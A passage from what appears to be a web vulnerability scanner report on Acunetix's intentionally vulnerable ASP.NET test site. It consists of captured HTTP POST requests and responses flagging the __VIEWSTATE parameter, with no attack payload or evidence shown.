href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1171 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,171 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8338&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgDAM7AJutoIZGRkedF%2FUVQCWfXbwKwfXJmHOUg1%2BCI%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLTk7L5DQLHkIz%2BDgL%2BkLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIC%2B6T5jQoC%2B6T5jQoC%2B6TtoAMC%2B6TtoAMC%2B6SBxwwC%2B6SBxwwC%2B6T1rAkC%2B6T1rAkC%2B6TpwwIC%2B6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3%2BQ8C3Mu3%2BQ8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5%2BoCAtzL5%2BoCAtzL29MPAtzL29MPAtzLz%2FYIAtzLz%2FYIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODA852athZcMzPVMGpbI1qPgYz7%2BsR
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:43:19 GMT Content-Length: 12617
Response Body - size: 12,617 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgDAM7AJutoIZGRkedF/UVQCWfXbwKwfXJmHOUg1+CI=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLTk7L5DQLHkIz+DgL+kLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIC+6T5jQoC+6T5jQoC+6TtoAMC+6TtoAMC+6SBxwwC+6SBxwwC+6T1rAkC+6T1rAkC+6TpwwIC+6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3+Q8C3Mu3+Q8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5+oCAtzL5+oCAtzL29MPAtzL29MPAtzLz/YIAtzLz/YIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODA852athZcMzPVMGpbI1qPgYz7+sR" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">November 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:White" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8345')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8346')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8347')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8348')" style="color:Black" title="November 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8349')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8350')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8351')" style="color:Black" title="November 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8352')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8353')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8354')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8355')" style="color:Black" title="November 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8356')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8357')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8358')" style="color:Black" title="November 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8359')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8360')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8361')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8362')" style="color:Black" title="November 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8363')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8364')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8365')" style="color:Black" title="November 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1171 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,171 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8354&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgDAz1acxtoIZGRkJgZNuiX9HZIRF53KMqGs%2FQs%2Bkuw%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL%2B4cq1CgLHkIz%2BDgL%2BkLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIC%2B6T5jQoC%2B6T5jQoC%2B6TtoAMC%2B6TtoAMC%2B6SBxwwC%2B6SBxwwC%2B6T1rAkC%2B6T1rAkC%2B6TpwwIC%2B6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3%2BQ8C3Mu3%2BQ8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5%2BoCAtzL5%2BoCAtzL29MPAtzL29MPAtzLz%2FYIAtzLz%2FYIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODA8LF6FeMR34bWIAnv5Ajk8Fvufyu
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:23:19 GMT Content-Length: 12617
Response Body - size: 12,617 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgDAz1acxtoIZGRkJgZNuiX9HZIRF53KMqGs/Qs+kuw=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL+4cq1CgLHkIz+DgL+kLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIC+6T5jQoC+6T5jQoC+6TtoAMC+6TtoAMC+6SBxwwC+6SBxwwC+6T1rAkC+6T1rAkC+6TpwwIC+6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3+Q8C3Mu3+Q8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5+oCAtzL5+oCAtzL29MPAtzL29MPAtzLz/YIAtzLz/YIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODA8LF6FeMR34bWIAnv5Ajk8Fvufyu" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">November 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8345')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8346')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8347')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8348')" style="color:Black" title="November 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8349')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8350')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8351')" style="color:Black" title="November 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8352')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8353')" style="color:Black" title="November 14">14</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8354')" style="color:White" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8355')" style="color:Black" title="November 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8356')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8357')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8358')" style="color:Black" title="November 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8359')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8360')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8361')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8362')" style="color:Black" title="November 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8363')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8364')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8365')" style="color:Black" title="November 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a 